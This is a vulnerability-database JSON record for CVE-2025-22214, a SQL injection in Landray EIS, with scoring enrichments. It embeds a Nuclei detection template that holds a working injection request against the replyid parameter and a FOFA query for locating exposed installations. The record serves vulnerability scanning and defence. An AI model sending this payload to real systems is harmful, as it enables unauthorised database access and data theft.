{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-22214/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-22214/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-22214/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-22214/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-22214/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-22214"},"sightings":{"href":"/api/v1/sightings/cve-2025-22214"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.01276,"kev":false,"percentile":0.68698},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-22214.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-22214\n\ninfo:\n  name: Landray EIS SQL注入漏洞\n  author: Ark\n  severity: critical\n  description: |\n    Landray EIS 2001 through 2006 contains a SQL injection caused by unsanitized input in Message/fi_message_receiver.aspx?replyid=, letting attackers execute arbitrary SQL commands, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.\n  remediation: |\n    Apply input validation and parameterized queries, update to the latest version if available.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-22214\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/jquery.landray.dialog.js\"\n  tags: cve,cve2025,landray,sqli,intrusive,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /Message/fi_message_receiver.aspx?replyid=1%20and%201=CONVERT(VARCHAR(32),HASHBYTES('MD5','123'),2)--+ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains_all(body, \"202CB962AC59075B964B07152D234B70\", \"varchar\", \"Landray\")'\n        condition: and\n# digest: 4a0a00473045022075692f6f9e032579be31982e73edf4da8186eebec657cfa64fb83cd7eadacaa9022100c8414f986aa71d99f1e0cc26ccfb6ea2e9a623a9a100aa946f8765c6b146eb0b:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-22214"}